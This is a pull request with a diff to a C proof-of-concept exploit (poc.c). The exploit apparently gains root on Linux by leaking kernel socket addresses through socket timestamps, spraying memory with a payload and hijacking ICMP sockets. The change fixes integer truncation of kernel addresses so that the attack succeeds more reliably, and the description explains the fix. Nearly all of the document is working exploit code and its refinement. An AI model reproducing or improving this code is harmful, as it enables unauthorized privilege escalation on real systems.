### PR TITLE
Better success detection and handling

### DIFF
--- a/poc.c
+++ b/poc.c
@@ -510,12 +510,11 @@ fill_with_payload(void *address, size_t size)
 }
 
 static int
-get_sk_from_timestamp(int sock)
+get_sk_from_timestamp(int sock, unsigned long *paddr)
 {
   struct timespec tv;
   uint64_t value;
-  unsigned high;
-  unsigned low;
+  uint32_t high, low;
   int ret;
 
   ret = ioctl(sock, SIOCGSTAMPNS, &tv);
@@ -528,7 +527,9 @@ get_sk_from_timestamp(int sock)
   low = (unsigned)value;
 
   if (high == TIMESTAMP_MAGIC) {
-    return low - OFFSET_SK_STAMP;
+    if (paddr)
+      *paddr = low - OFFSET_SK_STAMP;
+    return 1;
   }
 
   return 0;
@@ -577,7 +578,7 @@ try_control_sk(int *socks)
     fill_with_payload(address[i], MMAP_SIZE);
 
     for (j = 0; socks[j] != -1; j++) {
-      ret = get_sk_from_timestamp(socks[j]);
+      ret = get_sk_from_timestamp(socks[j], NULL);
       if (ret > 0) {
         success = 1;
         address[i] = 0;
@@ -673,7 +674,7 @@ do_get_root(int *socks)
   for (i = 0; socks[i] != -1; i++) {
     void *sk;
 
-    ret = get_sk_from_timestamp(socks[i]);
+    ret = get_sk_from_timestamp(socks[i], (unsigned long *)&sk);
     if (ret <= 0) {
       has_invalid_sk = 1;
       continue;
@@ -681,7 +682,6 @@ do_get_root(int *socks)
 
     success = 1;
 
-    sk = (void *)ret;
     setup_get_root(sk);
 
     close_icmp_socket(socks[i]);


### PR DESCRIPTION
Because get_sk_from_timestamp returns an int, successful attempts with sk
addresses larger than 0x7fffffff are incorrectly ignored. Use an unsigned
variable and propogate the result all the way back to main. We now stop on the
first successfully replaced socket and don't spend time re-detecting. We surely
created some invalid sockets, so we assume that is the case and always fork to
preserve system stability.
